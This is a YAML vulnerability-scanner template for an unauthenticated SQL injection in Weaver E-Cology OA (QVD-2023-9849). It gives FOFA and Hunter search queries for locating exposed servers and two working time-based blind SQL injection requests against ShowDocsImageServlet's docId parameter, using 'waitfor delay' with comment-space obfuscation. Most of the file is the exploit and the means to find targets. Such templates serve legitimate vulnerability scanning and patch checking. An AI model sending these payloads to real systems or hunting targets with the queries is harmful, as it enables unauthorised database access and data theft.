product: 泛微E-Cology
vName: 泛微E-Cology CheckServer.jsp SQL注入
type: SQL注入
vID:
  - QVD-2023-9849
level: 3
vDesc: 泛微 Ecology OA 系统对用户传入的数据过滤处理不当，导致存在 SQL 注入漏洞，未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令，从而窃取数据库敏感信息。
version: 泛微 Ecology 9.x <= v10.56；泛微 Ecology 8.x <= v10.56
note: ''
search:
  FOFA: app="泛微-OA（e-cology）"
  Hunter: app.name="泛微 e-cology 9.0 OA"
protocol: http
link: https://www.cnblogs.com/pursue-security/p/17677217.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /weaver/weaver.docs.docs.ShowDocsImageServlet?docId=112/**/and(select/**/1)>0/**/waitfor/**/delay'0:0:5'/**/
    verify:
      path: ''
      logic: and
      check:
        - time:
            check: '>='
            num: 5
  - exp:
      method: get
      follow: false
      path: /weaver/weaver.docs.docs.ShowDocsImageServlet?docId=122/**/and(select/**/1)>0/**/waitfor/**/delay'0:0:0'/**/
    verify:
      path: ''
      logic: and
      check:
        - time:
            check: <=
            num: 3